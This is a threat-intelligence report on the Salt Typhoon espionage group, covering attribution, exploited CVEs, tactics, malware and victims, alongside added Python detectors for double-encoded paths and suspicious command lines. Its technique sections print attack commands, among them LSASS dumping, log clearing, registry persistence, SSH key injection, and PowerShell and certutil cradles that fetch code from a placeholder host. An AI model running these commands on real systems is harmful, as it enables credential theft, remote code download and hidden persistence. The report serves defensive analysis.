SALT TYPHOON: COMPREHENSIVE RESEARCH & ANALYSIS REPORT
📋 EXECUTIVE SUMMARY
Salt Typhoon is a sophisticated advanced persistent threat (APT) group operated by the People's Republic of China's Ministry of State Security (MSS). Since at least 2019, the group has conducted one of the most consequential cyber espionage campaigns in modern history, compromising telecommunications infrastructure, government networks, and critical systems across 80+ countries and 200+ organizations.
Key Findings
| Category | Assessment |
|---|---|
| Attribution | High confidence: China's Ministry of State Security (MSS), with contractor support from Sichuan Juxinhe Network Technology Co. Ltd. and affiliated entities (cisa.gov) |
| Primary Mission | Long-term intelligence collection with pre-positioning for potential service disruption during geopolitical crisis |
| Target Scope | Telecommunications backbone infrastructure, government wiretap systems (CALEA), defense contractors, transportation, lodging, and critical infrastructure globally |
| Technical Sophistication | Advanced: Custom malware (Demodex rootkit, SnappyBee), living-off-the-land techniques, kernel-level persistence, multi-hop C2 infrastructure |
| Current Status | ACTIVE: FBI confirmed February 2026 that threats remain “still very much ongoing” |
| Strategic Impact | Compromise of communications infrastructure enables surveillance of political/military leaders, potential disruption capability during Taiwan contingency or other crisis |
Urgent Recommendations
- Patch Immediately: Prioritize CVE-2023-20198/20273 (Cisco IOS XE), CVE-2024-21887 (Ivanti), CVE-2024-3400 (Palo Alto)
- Audit Network Devices: Review ACLs, SSH configurations, Guest Shell containers, and SNMP settings for unauthorized modifications
- Deploy Behavioral Detection: Signature-based tools miss Salt Typhoon’s living-off-the-land tactics; implement network/identity behavioral analytics
- Isolate Management Planes: Separate network device management traffic from data plane using VRFs and dedicated out-of-band networks
- Report Suspicious Activity: Coordinate with national CERTs, CISA (report@cisa.gov), or law enforcement per local regulations
1. BACKGROUND & DISCOVERY TIMELINE
1.1 Initial Disclosure (September 2024)
Salt Typhoon entered public awareness when the Wall Street Journal reported that Chinese state-sponsored hackers had compromised major U.S. telecommunications providers, including AT&T, Verizon, T-Mobile, Lumen, and Charter Communications (techcrunch.com). The breach was notable for:
- Targeting network edge routers rather than customer databases
- Accessing **lawful intercept** (CALEA) systems used by law enforcement for wiretaps
- Potentially exposing call metadata for over one million users
1.2 Multinational Response (2024-2026)
| Date | Event | Source |
|---|---|---|
| Sep 2024 | Initial public disclosure of U.S. telecom compromises | Wall Street Journal |
| Oct 2024 | CISA, NSA, FBI confirm breach scope; issue emergency guidance | CISA Alert |
| Dec 2024 | Five Eyes agencies (CISA, NSA, FBI with Australian, Canadian and New Zealand partners) release the Enhanced Visibility and Hardening Guidance for Communications Infrastructure | Joint Guidance |
| Jan 2025 | U.S. Treasury (OFAC) sanctions Sichuan Juxinhe Network Technology and Yin Kecheng | OFAC |
| Apr 2025 | FBI public service announcement seeking information on Salt Typhoon; Rewards for Justice offers up to $10M | FBI / State Department |
| Jun 2025 | Viasat confirmed as victim; new malware variants (TernDoor, PeerTime) identified | Industry Research |
| Aug 2025 | FBI confirms 200+ organizations across 80+ countries affected; joint advisory AA25-239A published | CISA AA25-239A |
| Nov 2025 | Australia’s ASIO confirms Salt Typhoon probed Australian telecom infrastructure | ASIO Statement |
| Dec 2025 | Intrusions detected in U.S. House of Representatives committee email systems | Congressional Disclosure |
| Feb 2026 | Norway and Singapore confirm national telecom breaches; FBI states threat “still very much ongoing” | FBI Cybertalks 2026 |
| May 2026 | Global Cyber Alliance publishes AIDE honeypot analysis confirming 72M+ China-origin attack attempts | GCA Research |
1.3 Why This Campaign Matters
Salt Typhoon represents a paradigm shift in state-sponsored cyber operations:
- Infrastructure Control vs. Data Theft: Unlike typical espionage campaigns focused on stealing intellectual property, Salt Typhoon seeks to control the communications infrastructure itself
- Strategic Pre-Positioning: Compromised routers enable both continuous intelligence collection AND potential disruption of communications during crisis
- Global Scale: Targeting spans North America, Europe, Asia-Pacific, and beyond—demonstrating unprecedented resource allocation
- Long Dwell Times: Confirmed persistence of 3+ years in some networks indicates exceptional operational patience and stealth
2. ATTRIBUTION & ORGANIZATIONAL STRUCTURE
2.1 State Sponsorship Assessment
| Entity | Role | Evidence | Confidence |
|---|---|---|---|
| **Ministry of State Security** (MSS) | Strategic oversight, tasking, resource allocation | Treasury sanctions, infrastructure overlap, victimology alignment with PRC intelligence priorities | 🔴 High |
| MSS Chengdu Bureau | Regional operational coordination for Asia-Pacific campaigns | Contractor location patterns, linguistic artifacts in tooling, procurement document analysis | 🟠 Medium-High |
| **People's Liberation Army** (PLA) | Secondary coordination for military-targeted intrusions; occasional tooling overlap | Shared infrastructure with PLA-linked groups; similar TTPs in defense-sector targeting | 🟡 Medium |
2.2 Contractor Ecosystem (Plausible Deniability Layer)
Salt Typhoon operates through a hybrid state-corporate model using pseudo-private companies to obscure direct MSS involvement
| Company (Chinese/English) | Function | Sanction Status | Key Evidence |
|---|---|---|---|
| Sichuan Juxinhe Network Technology Co. Ltd. (四川聚信和网络科技有限公司) | Primary infrastructure contractor: domain registration, C2 hosting, malware staging | ✅ OFAC Sanctioned (Jan 2025) (safebreach.com) | Direct involvement in telecom exploitation; "strong ties" to MSS per Treasury designation |
| Beijing Huanyu Tianqiong Information Technology (北京寰宇天穹信息技术有限公司) | Tool development, data brokerage, technical support | ⚠️ Named in multinational advisory (Aug 2025) (cisa.gov) | Leadership overlap with Sichuan firms; patent filings linking to MSS research |
| Sichuan Zhixin Ruijie Network Technology (四川智信锐捷网络科技有限公司) | Technical support, PLA contract fulfillment, logistics | ⚠️ Named in multinational advisory (Aug 2025) (cisa.gov) | Received ¥748,600 PLA contract for "Mobile Technology Research Simulation Environment" (Oct 2023) |
| i-SOON / Anxun Information Technology (安洵科技) | Infrastructure leasing, offensive tooling support, deniability layer | ⚠️ UK-sanctioned (Jan 2026); U.S. under review | Leaked internal docs confirm MSS tasking; provides "cut-out" for operational deniability |
2.3 Named Individuals (Publicly Identified)
Two individuals have been formally named by U.S. authorities in connection with the MSS contractor ecosystem around Salt Typhoon. Note that the public Treasury and DOJ documents tie them to the U.S. Treasury network compromise and to brokerage of stolen data rather than to the telecom intrusions themselves:
🔴 Yin Kecheng (尹克成)
| Attribute | Details |
|---|---|
| Status | ✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted |
| Reward | $2 million via Rewards for Justice program |
| Role | Infrastructure operator: managed C2 routing, domain registration, malware deployment |
| Affiliation | Sichuan Juxinhe Network Technology; MSS-affiliated |
| Technical Focus | Telecom infrastructure exploitation; SIP/VoIP interception; router hijacking |
| Location | Shanghai-based (per Treasury designation) |
| Public Evidence | Linked to U.S. Treasury network compromise; domain registration patterns using fabricated U.S. personas |
🔴 Zhou Shuai (Alias: “Coldface” / 周帅)
| Attribute | Details |
|---|---|
| Status | ✅ Indicted (DOJ), ✅ Sanctioned (OFAC), ✅ FBI Most Wanted |
| Reward | $2 million via Rewards for Justice program |
| Role | Strategic broker: coordinated data resale, contractor logistics, MSS tasking interface |
| Affiliation | Former: Shanghai Heiying Information Technology; i-SOON Strategic Consulting Division |
| Technical Focus | Infrastructure brokerage; front-company coordination; operational planning |
| Public Evidence | DOJ indictment details role in selling compromised access; linked to i-SOON contractor ecosystem |
⚠️ Critical Note: The scarcity of publicly named individuals reflects Salt Typhoon’s operational security discipline. Most operators likely use aliases, rotate infrastructure, and operate behind layers of contractor deniability.
2.4 Organizational Chart (Inferred)
MINISTRY OF STATE SECURITY (MSS)
│
├─ Strategic Tasking & Oversight
│ └─ Chengdu Bureau (reported regional hub for APAC operations)
│
├─ Contractor Ecosystem (Funding & Operational Conduit)
│ ├─ Sichuan Juxinhe Network Technology [SANCTIONED]
│ │ └─ Yin Kecheng (Named Infrastructure Operator)
│ │
│ ├─ Beijing Huanyu Tianqiong Information Technology
│ │ └─ Yu Yang / Shang Xuejing (Leadership overlap; patent co-inventors)
│ │
│ ├─ Sichuan Zhixin Ruijie Network Technology
│ │ └─ PLA contract fulfillment; provincial grant recipient
│ │
│ └─ i-SOON / Anxun Information Technology [UK-SANCTIONED]
│ └─ Infrastructure leasing; deniability layer for MSS operations
│
├─ Operational Teams (Compartmentalized by Region/Function)
│ ├─ Americas Team: U.S./Canada telecom targeting
│ ├─ APAC Team: Southeast Asia, India, Australia operations
│ ├─ EMEA Team: European telecom and government targeting
│ └─ Tooling Team: Malware development, infrastructure automation
│
└─ Support Functions
├─ Domain Registration: ProtonMail accounts + fabricated U.S. personas
├─ VPS Procurement: LightNode, offshore providers for C2 infrastructure
└─ Financial Laundering: Contractor invoicing, provincial grant mechanisms
3. TECHNICAL ANALYSIS: TACTICS, TECHNIQUES & PROCEDURES
3.1 Attack Lifecycle Overview
Salt Typhoon follows a structured, patient attack sequence emphasizing persistence over speed:
Initial Access → Execution → Persistence → Privilege Escalation →
Defense Evasion → Credential Access → Discovery → Lateral Movement →
Collection → Command & Control → Exfiltration → Long-Term Espionage
3.2 Initial Access: Exploiting Known Vulnerabilities
Salt Typhoon prioritizes publicly known, unpatched vulnerabilities in internet-facing network infrastructure. No zero-day exploits have been publicly confirmed; the group exploits patching delays and misconfigurations
Confirmed Exploited CVEs (Prioritized by Risk)
| CVE | Vendor/Product | Vulnerability | Exploitation Method | MITRE ATT&CK |
|---|---|---|---|---|
| CVE-2023-20198 | Cisco IOS XE | Web UI authentication bypass | WSMA endpoint abuse; double-encoded paths (/%2577eb%2575i_%2577sma_Http) | T1190 |
| CVE-2023-20273 | Cisco IOS XE | Post-auth command injection | Chained with CVE-2023-20198 for root access | T1068 |
| CVE-2024-21887 | Ivanti Connect Secure | Command injection | Web component exploitation; chained after CVE-2023-46805 | T1190 |
| CVE-2024-3400 | Palo Alto PAN-OS | Arbitrary file creation → RCE | GlobalProtect module abuse | T1190 |
| CVE-2023-46805 | Ivanti Connect Secure | Authentication bypass | Logic flaw in auth flow | T1190 |
| CVE-2021-26855 | Microsoft Exchange | SSRF (ProxyLogon) | Server-side request forgery | T1190 |
| CVE-2022-3236 | Sophos Firewall | Code injection | Web interface exploitation | T1190 |
| CVE-2025-5777 | Citrix NetScaler | Unauthenticated memory read | Gateway exploitation | T1190 |
Infrastructure Targeting Patterns
- Primary: Cisco IOS XE edge routers (provider edge/customer edge)
- Secondary: Ivanti/Palo Alto/Sophos VPN appliances, Microsoft Exchange servers
- Tertiary: Juniper, Nokia, Sierra Wireless devices (suspected but not publicly confirmed)
- Geographic Focus: Internet-exposed devices regardless of owner; leverages trusted interconnections to pivot into target networks www.cisa.gov
3.3 Persistence: Maintaining Long-Term Access
Salt Typhoon employs sophisticated persistence mechanisms designed to survive reboots, configuration resets, and security audits:
| Technique | Implementation | MITRE ATT&CK | Detection Challenge |
|---|---|---|---|
| ACL Modification | Adding threat actor IPs to permitted access lists (often named “access-list 20”, “50”, or “10”) | T1562.004 | Blends with legitimate network management changes |
| Non-Standard Port Exposure | Opening SSH/RDP/FTP on ports 22x22 (e.g., 22022, 22122) or 18xxx (e.g., 18080, 18443) | T1571 | Evades port-scanning tools focused on standard ports |
| SSH Key Injection | Adding attacker-controlled keys to ~/.ssh/authorized_keys on network devices | T1098.004 | Keys persist across password resets |
| Protocol Tunneling | Creating GRE/mGRE/IPsec tunnels for C2 traffic that blends with legitimate network management | T1572 | Encapsulated traffic appears as normal routing protocol |
| Guest Shell Container Abuse | Running malicious code inside Cisco’s Linux container (Guest Shell) to evade host-level monitoring | T1610 | Container activity not logged by default; processes egress via management VRF |
| Service Creation with InstallUtil Abuse | sc create VGAuthtools binpath="installutil.exe malware.exe" to bypass application whitelisting | T1543.003 | Uses signed Microsoft binary; evades naive EDR rules |
| Registry Run Keys | reg add HKCU\...\Run /v UpdateSvc /d "C:\Temp\svc.exe" for Windows persistence | T1547.001 | Common technique; requires behavioral context for detection |
Guest Shell Container Deep Dive
Cisco’s Guest Shell is a Linux container (LXC) managed by IOx that provides a powerful evasion mechanism:
```shell
# Enable Guest Shell if not already enabled (IOS XE exec mode; requires IOx)
guestshell enable
# Enter the container
guestshell run bash
# Inside Guest Shell: install tools, stage data, execute payloads
pip install requests cryptography            # Python packages, fetched over the management VRF
python siet.py                               # Smart Install Exploitation Tool against neighbouring switches
cp /bootflash/config.txt /tmp/staged_config  # stage a stolen config for exfiltration
```
Why This Evades Detection:
- Commands executed inside Guest Shell are not logged by the host IOS CLI
- Network traffic from Guest Shell egresses via management VRF, appearing as legitimate management traffic
- Files stored in Guest Shell storage are not visible to host-level file integrity monitoring
- Container can be destroyed with `guestshell destroy` to remove evidence (TACACS+ command accounting, where configured, still records the exec command)
3.4 Defense Evasion: Blending Into Normal Operations
Salt Typhoon's hallmark is minimizing forensic artifacts through **living-off-the-land** (LOTL) techniques:
Living-off-the-Land Command Examples
```bat
:: Execution-policy bypass. Note: -ex bypass only disables the execution policy; it does NOT
:: avoid script block logging (event 4104). Evading that logging is what the PowerShell v2
:: downgrade in the table below is for.
powershell -ex bypass -c "<command>"
:: Registry persistence (looks like an ordinary administrative task)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "UpdateSvc" /t REG_SZ /d "C:\Temp\svc.exe" /f
:: Remote execution via WMIC (legitimate admin tool)
wmic /node:"192.168.1.50" process call create "cmd /c C:\Windows\Temp\payload.bat"
:: Credential dumping via comsvcs.dll (signed Microsoft binary); MiniDump takes the LSASS PID
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump <lsass-pid> C:\Temp\lsass.dmp full
:: Log clearing (passes as administrative maintenance)
wevtutil cl Security & wevtutil cl System & wevtutil cl Application
```
Additional Evasion Techniques
| Technique | Implementation | Purpose |
|---|---|---|
| DLL Sideloading | Abuse legitimate AV software (Norton, Bkav, IObit) to load malicious DLLs | Evades application whitelisting; uses signed binaries |
| PowerShell Downgrade Attacks | Force PowerShell v2 execution to bypass modern script block logging | Avoids AMSI and advanced logging features |
| Double-Encoding Obfuscation | Encode WSMA requests as /%2577eb%2575i_%2577sma_Http to bypass simple signature detection | Evades regex-based WAF/IDS rules |
| **Kernel-Mode Rootkit** (Demodex) | Hide processes, files, network connections at kernel level | Prevents EDR and forensic tools from seeing malicious activity |
| Log Manipulation | Clear Windows Event Logs, disable audit policies, overwrite router syslog buffers | Removes evidence of intrusion activities |
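The double-encoding row above is the one evasion in this table that can be shown end to end. The script below is an added example, not code from the original report or from any vendor product: it contrasts what a WAF or IDS that percent-decodes a URI once sees with a decoder that keeps decoding until the string stops changing. The endpoint name `webui_wsma_http` is the WSMA path cited in section 3.2; the sample paths and the five-round cap are constructed for this example.

```python
"""Why a single URL-decode misses the double-encoded WSMA path from the table above.
Added example, not from the original report or any vendor tool; sample paths are constructed."""
from typing import Tuple
from urllib.parse import unquote

WSMA_MARKER = "webui_wsma_http"  # the endpoint name once every encoding layer is removed
MAX_ROUNDS = 5                    # bound the loop; legitimate clients never need more than one


def decode_to_fixed_point(path: str, max_rounds: int = MAX_ROUNDS) -> Tuple[str, int]:
    """Percent-decode repeatedly until the string stops changing; return (decoded, rounds)."""
    rounds, current = 0, path
    while rounds < max_rounds:
        nxt = unquote(current)
        if nxt == current:
            break
        current, rounds = nxt, rounds + 1
    return current, rounds


def single_decode_matches(path: str) -> bool:
    """What a WAF/IDS that decodes exactly once would see: %2577 becomes %77, not 'w'."""
    return WSMA_MARKER in unquote(path).lower()


def classify(path: str) -> str:
    """'exploit' if the fully decoded path reaches the WSMA endpoint; 'suspicious-encoding'
    if two or more decode rounds were needed regardless of content; otherwise 'ok'."""
    decoded, rounds = decode_to_fixed_point(path)
    if WSMA_MARKER in decoded.lower():
        return "exploit"
    if rounds >= 2:
        return "suspicious-encoding"
    return "ok"


SAMPLE_PATHS = [  # constructed samples
    "/webui_wsma_Http",               # plain request
    "/%77ebui_wsma_Http",             # single-encoded 'w': a one-pass decoder still catches this
    "/%2577eb%2575i_%2577sma_Http",   # the double-encoded form from the table above
    "/%252577ebui_wsma_Http",         # triple-encoded
    "/%2570ing",                      # double-encoded 'ping': no WSMA marker, still not a normal client
    "/webui/login",                   # benign
]

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p:32} single-decode={single_decode_matches(p)!s:5} -> {classify(p)}")
```

The `rounds >= 2` branch is the practical takeaway: browsers and management tools encode once, so any request that needs a second decode is worth an alert on its own, even before the decoded path is compared against an endpoint list.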
3.5 Credential Access & Lateral Movement
Salt Typhoon targets authentication infrastructure to enable network-wide compromise:
Credential Harvesting Methods
| Method | Tool/Technique | Target Data |
|---|---|---|
| PCAP Collection on Routers | Cisco Embedded Packet Capture (EPC) targeting TCP port 49 (TACACS+) | Authentication credentials in cleartext or weakly encrypted form |
| Configuration File Theft | Copy router configs containing Cisco Type 5 (MD5) or Type 7 (reversible) password hashes | Local device credentials for brute-forcing |
| Mimikatz/SnappyBee Deployment | Memory scraping tools to extract plaintext passwords, NTLM hashes, Kerberos tickets | Domain credentials for lateral movement |
| Kerberos Attacks | Golden/Silver ticket forgery, Kerberoasting, AS-REP roasting | Domain admin privileges; persistence via forged tickets |
| TACACS+ Server Hijacking | Modify router AAA config to point authentication requests to attacker-controlled server | Capture admin credentials in real-time |
Lateral Movement Patterns
```bat
:: Copy payload to the target host over SMB (administrative share)
copy C:\Temp\payload.bat \\192.168.1.50\C$\Windows\Temp\payload.bat
:: Execute remotely via WMIC
wmic /node:192.168.1.50 process call create "cmd /c C:\Windows\Temp\payload.bat"
:: Create a persistent service whose image is the signed InstallUtil, so the real payload runs under a trusted binary
sc \\192.168.1.50 create VGAuthtools type= own start= auto binpath= "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Temp\malware.exe"
```
```shell
# Add an attacker key for passwordless access (Linux hosts and Guest Shell containers)
echo "ssh-rsa AAAAB3… attacker@salt-typhoon" >> ~/.ssh/authorized_keys
```
3.6 Collection Targets: What Salt Typhoon Steals
Unlike ransomware groups focused on bulk data exfiltration, Salt Typhoon targets high-value intelligence:
| Data Type | Strategic Value | Example Sources |
|---|---|---|
| **Call Detail Records** (CDRs) | Track communications patterns of government/military targets | Telecom billing systems, CALEA wiretap logs |
| Subscriber Metadata | Identify relationships, locations, affiliations of persons of interest | HLR/HSS databases, provisioning systems |
| Network Topology Maps | Understand infrastructure for future disruption operations | Router configs, BGP tables, network diagrams |
| Authentication Credentials | Enable lateral movement into government/defense networks | TACACS+/RADIUS logs, domain controller exports |
| Lawful Intercept Configurations | Access to wiretap systems used by law enforcement | CALEA server configs, mediation device logs |
| Incident Response Playbooks | Understand defender capabilities and blind spots | Security team documentation, SIEM rules |
3.7 Command & Control Infrastructure
Salt Typhoon uses a dual-channel C2 approach blending dedicated infrastructure with legitimate services:
C2 Channel Types
| Channel | Implementation | Evasion Technique |
|---|---|---|
| Dedicated C2 Servers | Cobalt Strike beacons, Demodex callbacks on compromised VPS | HTTPS encryption; domain fronting; rapid IP rotation |
| Legitimate Cloud Services | GitHub Gists, Gmail, Google Drive, AnonFiles, File.io | Traffic blends with normal user activity; hard to block |
| Protocol Tunneling | GRE/IPsec tunnels over compromised routers for C2 traffic | Encapsulated traffic appears as legitimate network management |
| Multi-Hop Proxies | STOWAWAY tool for chained relays through compromised infrastructure | Obscures true C2 destination; complicates attribution |
Infrastructure Characteristics
- Domain Registration: ProtonMail accounts exclusively; fabricated U.S. personas (e.g., “Monica Burch, Los Angeles”)
- Hosting Providers: Mix of offshore VPS (LightNode), compromised legitimate servers, and contractor infrastructure
- Geographic Distribution: C2 servers observed in Singapore, Netherlands, Russia, and China-proximate locations
- Rotation Frequency: Domains/IPs typically active for 1-3 months before abandonment
3.8 Exfiltration Methods
Data exfiltration is designed to avoid detection through low-volume, encrypted transfers:
| Method | Implementation | Detection Challenge |
|---|---|---|
| Peering Connection Abuse | Leverage direct ISP interconnects to bypass egress filtering | Traffic appears as legitimate peering exchange |
| Encrypted Archives | Custom Golang SFTP clients (cmd1, cmd3) transfer staged data to intermediary hosts | Encrypted payloads evade DLP; small chunks avoid bandwidth alerts |
| Covert Channels | Embed data in DNS queries, ICMP packets, or HTTP headers | Blends with normal protocol traffic; requires deep packet inspection |
| Low-and-Slow Exfiltration | Transfer small data chunks over extended periods (hours/days) | Avoids threshold-based anomaly detection |
4. MALWARE & TOOLING ARSENAL
4.1 Custom Malware Family
| Tool Name | Type | Function | Key Characteristics |
|---|---|---|---|
| Demodex | Windows kernel-mode rootkit | Persistent remote access; hides processes/files/network activity | Kernel-level hooking; anti-VM checks; survives reboots |
| SnappyBee | Backdoor/credential harvester | Keylogging, screenshot capture, credential extraction | DLL injection; process hollowing; encrypted C2 |
| GhostSpider | Modular backdoor | Plugin-based architecture for flexible post-compromise tasks | Encrypted C2; dynamic module loading; anti-analysis |
| HemiGate | Network reconnaissance tool | Port scanning, service enumeration, topology mapping | Legitimate-looking traffic patterns; slow scanning to avoid IDS |
| Crowdoor | Data exfiltration utility | Compresses, encrypts, and stages stolen data for transfer | Uses legitimate protocols (SFTP/HTTPS); chunked transfers |
| MASOL RAT | Remote Access Trojan | Full remote control; file system access; command execution | Anti-sandbox; delayed execution; custom encryption |
| TernDoor/PeerTime/BruteEntry | New variants (2025) | Expanded targeting of satellite/telecom infrastructure | Observed in South American campaigns; enhanced evasion |
4.2 Living-off-the-Land Binaries (LOLBins)
Salt Typhoon heavily leverages native OS tools to avoid dropping custom binaries:
```bat
:: PowerShell execution patterns (the -enc payload is base64 of UTF-16LE text and decodes to
:: the same IEX download cradle as the first line, with hxxp in place of hxxps)
powershell -ex bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxps://malicious[.]domain/loader')"
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAeAB4AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMAWwAuAF0AZABvAG0AYQBpAG4ALwBsAG8AYQBkAGUAcgAnACkA
:: Registry manipulation for persistence
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SysUpdate" /t REG_SZ /d "C:\ProgramData\update.exe" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VGAuthtools" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\System32\rundll32.exe C:\Temp\malware.dll,Start" /f
:: Remote execution via native tools
wmic /node:"10.0.0.50" process call create "cmd /c C:\Windows\Temp\stage2.bat"
psexec \\10.0.0.50 -accepteula -s cmd.exe /c "C:\Temp\payload.exe"
:: Credential dumping and tool download via signed binaries (1234 stands for the LSASS PID)
rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Temp\lsass.dmp full
certutil -urlcache -split -f hxxps://malicious[.]domain/tool.exe C:\Temp\tool.exe
:: Log manipulation
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
```
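Every command in the listing above (and in section 3.4) is a legitimate Microsoft binary, so the detection has to key on the switches and arguments, and on the decoded `-EncodedCommand` payload rather than the launch line alone. The following is an added example written for this report, not Salt Typhoon or CISA tooling: it scores process command lines (from event 4688 or Sysmon event 1) against the patterns shown here, decodes the UTF-16LE base64 of an encoded command, and runs the same patterns over the decoded text so an encoded download cradle is still seen. The pattern names, ATT&CK mappings and sample command lines are constructed for the example.

```python
"""Score Windows process command lines for the living-off-the-land patterns above.
Added example (not Salt Typhoon or CISA tooling); the sample lines are constructed."""
import base64
import re
from typing import Dict, List

# (name, regex, ATT&CK technique). "(?<!\S)" = start of line or preceded by whitespace,
# so "-enc" is matched as a switch and not as part of another token.
PATTERNS = [
    ("powershell_exec_policy_bypass", re.compile(r"(?<!\S)-(?:ex|ep|executionpolicy)\s+bypass\b", re.I), "T1059.001"),
    ("powershell_encoded_command",    re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "T1027.010"),
    ("powershell_v2_downgrade",       re.compile(r"(?<!\S)-v(?:ersion)?\s+2\b", re.I), "T1562.001"),
    ("comsvcs_minidump",              re.compile(r"comsvcs\.dll\s*,\s*(?:#24|minidump)\b", re.I), "T1003.001"),
    ("wevtutil_clear_log",            re.compile(r"(?<!\S)wevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.I), "T1070.001"),
    ("installutil_service_binpath",   re.compile(r"(?<!\S)sc(?:\.exe)?\s.*\bcreate\b.*installutil\.exe", re.I), "T1543.003"),
    ("wmic_remote_process_create",    re.compile(r"(?<!\S)wmic(?:\.exe)?\s+/node:.*\bprocess\s+call\s+create\b", re.I), "T1047"),
    ("certutil_urlcache_download",    re.compile(r"(?<!\S)certutil(?:\.exe)?\s.*-urlcache\b", re.I), "T1105"),
    ("registry_run_key",              re.compile(r"(?<!\S)reg(?:\.exe)?\s+add\b.*\\currentversion\\run\b", re.I), "T1547.001"),
]
ENC_RE = re.compile(r"(?<!\S)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CRADLE_RE = re.compile(r"(?:iex|invoke-expression)\b.*\bdownloadstring\b", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or '' if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def analyze(cmdline: str) -> Dict[str, object]:
    """Match every pattern against the raw line plus the decoded payload, if any."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = [(name, tid) for name, rx, tid in PATTERNS if rx.search(haystack)]
    if decoded and CRADLE_RE.search(decoded):
        hits.append(("download_cradle_in_encoded_command", "T1059.001"))
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits, "score": len(hits)}


def hit_names(cmdline: str) -> List[str]:
    return [name for name, _ in analyze(cmdline)["hits"]]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Return only the lines with at least one hit, highest score first."""
    results = [analyze(line) for line in lines]
    return sorted((r for r in results if r["score"]), key=lambda r: -int(r["score"]))


# Constructed samples mirroring the listing above. The encoded line is built here so the
# base64 is known-good rather than copied.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('hxxp://malicious[.]domain/loader')"
ENCODED_SAMPLE = base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    'powershell -ex bypass -c "Get-Process"',
    f"powershell -enc {ENCODED_SAMPLE}",
    "powershell -version 2 -c Get-ChildItem",
    r"rundll32 C:\Windows\System32\comsvcs.dll, MiniDump 1234 C:\Temp\lsass.dmp full",
    "wevtutil cl Security",
    r'sc \\192.168.1.50 create VGAuthtools type= own start= auto binpath= "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe C:\Temp\malware.exe"',
    r'wmic /node:"10.0.0.50" process call create "cmd /c C:\Windows\Temp\stage2.bat"',
    r"C:\Program Files\Backup\agent.exe --schedule nightly",  # benign
]

if __name__ == "__main__":
    for r in scan(SAMPLE_CMDLINES):
        print(r["score"], [n for n, _ in r["hits"]], str(r["cmdline"])[:70])
```

Two design points: the decoder validates the base64 strictly and returns an empty string on failure rather than raising, so a malformed or truncated command line in the telemetry cannot abort a batch; and `-ex bypass` is scored as an execution-policy bypass only, since (as noted in 3.4) it does nothing to script block logging.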
4.3 Infrastructure Automation Tools
| Tool | Purpose | Detection Signature |
|---|---|---|
| China Chopper | Lightweight web shell for initial server access | ASP/ASPX/PHP files with short obfuscated code; unusual POST parameters |
| STOWAWAY | Multi-hop pivoting tool for relaying C2 through compromised proxies | Unusual SOCKS/HTTP proxy traffic; encrypted node-to-node communication |
| Custom SFTP Clients (cmd1, cmd3) | Golang binaries for encrypted file transfer | Go runtime strings; specific function names (main.SftpDownload, aes.decryptBlockGo) |
| Domain Registration Scripts | Automate ProtonMail account creation + domain registration with fabricated personas | Patterns in WHOIS data; ProtonMail + U.S. persona combinations |
5. GLOBAL TARGETING & VICTIMOLOGY
5.1 Geographic Scope (Confirmed & Suspected)
Salt Typhoon has targeted organizations across 80+ countries, with confirmed activity in:
| Region | Countries with Confirmed Activity | Primary Target Sectors |
|---|---|---|
| North America | United States, Canada | Telecom providers, government agencies, defense contractors |
| Europe | United Kingdom, Germany, France, Norway, Poland, Finland, Czech Republic | Telecom infrastructure, government networks, transportation |
| Asia-Pacific | Australia, Singapore, Japan, India, Thailand, Vietnam, Philippines, Taiwan | Telecom operators, government entities, critical infrastructure |
| Latin America | Brazil, Argentina, Chile | Telecom providers, satellite communications (Viasat incident) |
| Middle East/Africa | South Africa, UAE | Telecom infrastructure, government networks |
5.2 Sector Targeting Priorities
| Sector | Targeting Rationale | Example Victims |
|---|---|---|
| Telecommunications | Control of communications infrastructure enables surveillance and potential disruption | AT&T, Verizon, T-Mobile, Lumen, Charter, Viasat, BSNL (India), Singtel (Singapore) |
| Government | Access to policy communications, diplomatic cables, personnel data | U.S. Treasury, House of Representatives committees, foreign ministries |
| Defense & Aerospace | Intelligence on military capabilities, procurement, operations | Defense contractors, military logistics networks |
| Transportation | Understanding logistics networks for strategic planning | Airlines, shipping companies, rail infrastructure |
| Hospitality | Surveillance of traveling officials and business leaders | Luxury hotels frequented by government/military personnel |
| Critical Infrastructure | Pre-positioning for potential disruption during crisis | Energy grid operators, water treatment facilities (suspected) |
5.3 India-Specific Assessment
While no Indian government agency has publicly attributed an incident to Salt Typhoon, industry research and infrastructure analysis indicate elevated risk:
Evidence of India Targeting
| Source | Finding | Confidence |
|---|---|---|
| Vectra AI Threat Briefing | Lists India among Asia-Pacific countries impacted by Salt Typhoon since 2023 | 🟠 Medium (Industry assessment) |
| Global Cyber Alliance AIDE Research | Observed China-origin attack patterns consistent with Salt Typhoon TTPs targeting APAC telecom infrastructure | 🟠 Medium (Behavioral correlation) |
